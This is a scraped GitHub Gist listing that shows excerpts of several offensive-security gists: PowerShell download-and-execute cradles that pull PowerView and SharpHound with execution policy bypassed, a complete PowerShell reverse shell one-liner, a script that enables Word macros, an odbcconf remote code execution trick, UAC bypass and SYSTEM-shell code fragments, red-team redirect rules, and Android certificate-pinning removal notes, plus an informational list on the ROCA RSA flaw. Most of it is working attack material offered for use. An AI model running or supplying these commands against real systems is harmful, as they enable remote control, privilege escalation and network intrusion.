Enter this in the search box along with your search terms:
Get all gists from the user santisbon.
user:santisbon
Find all gists with a .yml extension.
extension:yml
Find all gists with HTML files.
language:html
filipesam
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
Mbosinwa
/ block-macro-ms-office.txt
Last active
February 19, 2025 11:03
— forked from PSJoshi/block-macro-ms-office.txt
Block macros in Microsoft Office suite using registry
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The default registry key for macro security is | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security] | |
| "VBAWarnings"=dword:00000001 | |
| You could set it with a script: | |
| Set wso = CreateObject("WScript.Shell") | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| and it would enable macros. This only works if Word is either closed when you run the script or restarted afterwards. |
egre55
/ powershell_reverse_shell.ps1
Last active
April 2, 2025 13:44
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
Arno0x
/ odbcconf.cs
Created
November 22, 2017 15:30
Download and execute arbitrary code with odbcconf.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| To use with odbcconf.exe: | |
| odbcconf /S /A {REGSVR odbcconf.dll} | |
| or, from a remote location (if WebDAV support enabled): | |
| odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll} | |
| */ | |
| using System; |
hfiref0x
/ akagi_42b.c
Last active
February 14, 2024 11:56
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IFwCplLua IFwCplLua; | |
| typedef struct IFwCplLuaInterfaceVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IFwCplLua * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
masthoon
/ SystemCMD.cpp
Last active
October 3, 2024 18:16
Launch SYSTEM CMD in user current session (from a service)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
hannob
/ infineon-roca.md
Last active
February 12, 2025 22:06
Affected Products and Keys by Infineon RSA vulnerability
Collecting some information about the extend and affected products and keys of the Infineon RSA vulnerability (ROCA).
- Official ROCA infos by the bug finders
- Test tool on Github
- Online test
- Information from Infineon
- CVE-2017-15361
- CERT/CC advisory
Estonian eID cards
curi0usJack
/ .htaccess
Last active
April 9, 2025 16:33
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
mbrownnycnyc
/ android_apk_cert_pinning_mitm.txt
Last active
March 18, 2023 03:32
Android APK cert pinning removal and MiTM - focusing on Sense Home Energy Monitor APK
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://dl.google.com/android/repository/tools_r25.2.3-windows.zip | |
| https://medium.com/@felipecsl/bypassing-certificate-pinning-on-android-for-fun-and-profit-1b0d14beab2b#.pnph846be | |
| http://www.security-assessment.com/files/documents/whitepapers/Bypassing%20SSL%20Pinning%20on%20Android%20via%20Reverse%20Engineering.pdf | |
| https://stackoverflow.com/questions/64364407/app-not-installing-in-android-11-but-works-on-previous-versions | |
| 1) download apktool and the build tools (http://androidsdkoffline.blogspot.com/p/android-sdk-build-tools.html) and platform tools (https://developer.android.com/studio/releases/platform-tools.html) | |
| "C:\Users\mbrown\Desktop\Sense APK\apktool" d base.apk |